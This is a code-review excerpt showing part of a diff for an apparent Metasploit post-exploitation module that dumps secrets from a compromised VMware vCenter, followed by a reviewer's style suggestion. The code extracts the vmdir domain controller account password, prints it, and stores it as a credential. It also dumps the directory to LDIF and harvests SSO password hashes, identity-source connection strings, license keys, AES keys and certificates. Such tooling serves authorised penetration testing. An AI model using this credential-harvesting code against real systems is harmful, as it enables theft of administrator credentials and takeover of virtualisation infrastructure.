modules/post/linux/gather/vcenter_secrets_dump.rb

```diff
@@ -0,0 +1,875 @@
+    end
+
+    self.base_fqdn = vsphere_domain_name.to_s.downcase
+    vprint_status("vSphere SSO Domain FQDN: #{base_fqdn}")
+
+    vsphere_domain_dn = 'dc=' + base_fqdn.split('.').join(',dc=')
+    self.base_dn = vsphere_domain_dn
+    vprint_status("vSphere SSO Domain DN: #{base_dn}")
+
+    vprint_status('Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...')
+    vsphere_domain_dc_dn = get_domain_dc_dn
+    unless is_dn?(vsphere_domain_dc_dn)
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountDN from lwregshell')
+    end
+
+    self.bind_dn = vsphere_domain_dc_dn
+    print_good("vSphere SSO DC DN: #{bind_dn}")
+    self.bind_pw = get_domain_dc_password
+    unless bind_pw
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')
+    end
+
+    print_good("vSphere SSO DC PW: #{bind_pw}")
+    self.shell_bind_pw = "'#{bind_pw.gsub("'") { "\\'" }}'"
+
+    extra_service_data = {
+      address: Rex::Socket.getaddress(rhost),
+      port: 389,
+      service_name: 'ldap',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+      realm_value: base_fqdn
+    }
+
+    store_valid_credential(user: bind_dn, private: bind_pw, service_data: extra_service_data)
+
+    get_aes_keys_from_host
+  end
+
+  def vmdir_dump
+    print_status('Dumping vmdir schema to LDIF and storing to loot...')
+    vmdir_ldif = get_ldif_contents(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)
+    return if vmdir_ldif.nil?
+
+    p = store_loot('vmdir', 'LDIF', rhost, vmdir_ldif, 'vmdir.ldif', 'vCenter vmdir LDIF dump')
+    print_good("LDIF Dump: #{p}")
+
+    print_status('Processing vmdir LDIF (this may take several minutes) ...')
+    ldif_file = ::File.open(p, 'rb')
+    ldif_data = Net::LDAP::Dataset.read_ldif(ldif_file)
+
+    print_status('Processing LDIF entries ...')
+    entries = ldif_data.to_entries
+
+    print_status('Processing SSO account hashes ...')
+    vmware_sso_hash_entries = entries.select { |entry| entry[:userpassword].any? }
+    process_hashes(vmware_sso_hash_entries)
+
+    print_status('Processing SSO identity sources ...')
+    vmware_sso_id_entries = entries.select { |entry| entry[:vmwSTSConnectionStrings].any? }
+    process_sso_providers(vmware_sso_id_entries)
+
+    if datastore['DUMP_LIC']
+      print_status('Extract licenses from vCenter platform ...')
+      vmware_license_entries = entries.select { |entry| entry[:vmwLicSvcLicenseSerialKeys].any? }
+      get_vc_licenses(vmware_license_entries)
+    end
+  end
+
+  def vmafd_dump
+    if vcenter_infrastructure
+      get_vmca_cert
+      get_idp_creds
+    end
+
+    vecs_stores = get_vecs_stores
+    return if vecs_stores.nil?
+
+    unless vecs_stores.first
+      print_error('Empty vecs-cli store list returned from vCenter')
```

Comment:
This is some awkward logic given the message.

```suggestion
    if vecs_stores.empty?
      print_error('Empty vecs-cli store list returned from vCenter')
```